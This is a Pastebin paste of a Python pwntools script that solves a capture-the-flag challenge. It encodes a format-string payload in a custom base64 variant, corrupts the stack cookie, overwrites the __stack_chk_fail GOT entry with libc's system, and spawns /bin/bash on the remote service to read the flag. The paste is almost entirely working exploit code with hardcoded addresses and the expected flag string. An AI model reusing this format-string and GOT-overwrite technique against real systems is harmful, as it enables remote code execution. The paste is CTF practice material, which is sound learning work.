Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import base64
- import sys
- from pwn import *
- # MEGAN35 DECODER, GOTO LINE 44
- megan35 = "3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5"
- atom128 = "/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC"
- zong22 = "ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2"
- hazz15 = "HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5"
- base = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
- class B64VariantEncoder:
- def __init__(self, translation):
- base = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
- self.lookup = dict(zip(base, translation))
- self.revlookup = dict(zip(translation, base))
- def encode(self, text):
- global lookup
- b64 = base64.b64encode(text)
- result = "".join([self.lookup[x] for x in b64])
- return result
- def decode(self, code):
- global revlookup
- b64 = "".join([self.revlookup[x] for x in code])
- result = base64.b64decode(b64)
- return result
- def encode(variant, text):
- encoder = B64VariantEncoder(variant)
- return encoder.encode(text)
- def decode(variant, code):
- try:
- encoder = B64VariantEncoder(variant)
- return encoder.decode(code)
- except KeyError:
- return "no valid encoding"
- except TypeError:
- return "no correct padding"
- # Basic idea of attack, corrupt stack cookie, overwrite __stack_check_fail in GOT
- STACK_COOKIE = 0xffffddd0-52 # leaked stack address, found offset to cookie
- FAIL_GOT=0x804A018
- TARGET=0xf7e38940 # target address of system in libc, accounted for 0x1b000 page offset
- # overwrite both GOT address and stack cookie using %(h){1-2}n printf
- payload=p32(STACK_COOKIE) # 71
- payload+=p32(FAIL_GOT) # 72
- payload+=p32(FAIL_GOT+1) # 73
- payload+=p32(FAIL_GOT+2) # 74
- payload+=p32(FAIL_GOT+3) # 75
- payload+="%71$n" # corrupt cookie
- payload+="%37x"
- payload+="%73$hhn"
- payload+=" "
- payload+="%72$hhn"
- payload+="%165x"
- payload+="%74$hhn"
- payload+="%18x" # overwrite got address
- payload+="%75$hhn;/bin/bash" # run /bin/bash
- # some debug output
- log.warn("Stack cookie at {0}".format(hex(STACK_COOKIE)))
- # megan35 encode the payload
- sendit = encode(megan35, payload)
- #send ittttttttttttt
- p = remote("megan35.stillhackinganyway.nl", 3535)
- p.sendline(sendit)
- p.recv(1024) # payload output
- p.recv(1024) # shell error
- p.sendline("\n\ncat flag")
- flag = p.recv(1024)
- assert ("flag{43eb404b714b8d22e1168775eba1669c}" in flag)
- log.info("{0}".format(flag))
- p.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement